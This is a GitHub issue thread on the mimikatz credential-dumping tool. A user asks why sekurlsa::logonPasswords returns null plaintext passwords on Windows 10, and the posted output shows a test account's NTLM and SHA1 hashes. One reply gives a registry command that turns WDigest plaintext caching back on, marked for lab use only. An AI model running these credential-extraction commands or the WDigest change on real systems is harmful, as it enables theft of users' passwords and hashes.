Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

sekurlsa::logonPasswords does not show password #204

Closed
ilovefood2 opened this issue Apr 22, 2019 · 7 comments
Closed

sekurlsa::logonPasswords does not show password #204

ilovefood2 opened this issue Apr 22, 2019 · 7 comments

Comments

@ilovefood2
Copy link

ilovefood2 commented Apr 22, 2019
edited
Loading

I was trying to test program following instructions from wiki and for basic passwords retrieval the program does not show anything, even though my password is simple as one letter.

environment : win10 x64 1803
no antivirus
disabled windows defender
powershell was run under administrator privilege
`
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 6518309 (00000000:00637625)
Session : RemoteInteractive from 3
User Name : testuser
Domain : COMPUTER
Logon Server : COMPUTER
Logon Time : 4/22/2019 3:01:54 AM
SID : S-1-5-21-1089944888-3404997787-2047992866-1002
msv :
[00000003] Primary
* Username : testuser
* Domain : COMPUTER
* NTLM : c777f2dd81cff5aab5e27eadf2db6eb0
* SHA1 : f17a98e79ca54d3a14ca73f29814db5b9925b1d1
tspkg :
wdigest :
* Username : testuser
* Domain : COMPUTER
*** Password : (null)**
kerberos :
* Username : testuser
* Domain : COMPUTER
*** Password : (null)**
ssp :
credman :`

no matter how I tried, passwords always showed ### null

any idea why?
@super0xbad1dea
Copy link

WDigest should be disabled by default in Win10 1803, this could be the reason.

@ilovefood2
Copy link
Author

then what can we do in this case?

@xixiranran
Copy link

WDigest should be disabled by default in Win10 1803, this could be the reason.

this is not the reason?i cannot make it works.

@super0xbad1dea
Copy link

Dudes, if you wanna play with this, just search it how to enable WDigest. Be curious.

Look here: http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/

Enable WDigest (Plz only in your Lab)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

@ilovefood2
Copy link
Author

I don't think this is the cause since I tried on another win10 machine and passwords showed up.
the only thing different with those two machines is that one is non-domain, the other is.
so I guess this tool doesn't work on non-domain user accounts?

@xixiranran
Copy link

Dudes,如果你想玩这个,只需搜索它如何启用WDigest。保持好奇心。

请看这里:http:[//woshub.com/how-to-get-plain-text-passwords-of-windows-users/](http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/)

启用WDigest(仅在实验室中使用Plz)
reg add HKLM \ SYSTEM \ CurrentControlSet \ Control \ SecurityProviders \ WDigest / v UseLogonCredential / t REG_DWORD / d 1

I Have tried it but it not works.

@gentilkiwi
Copy link
Owner

#40 (comment)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@gentilkiwi @ilovefood2 @xixiranran @super0xbad1dea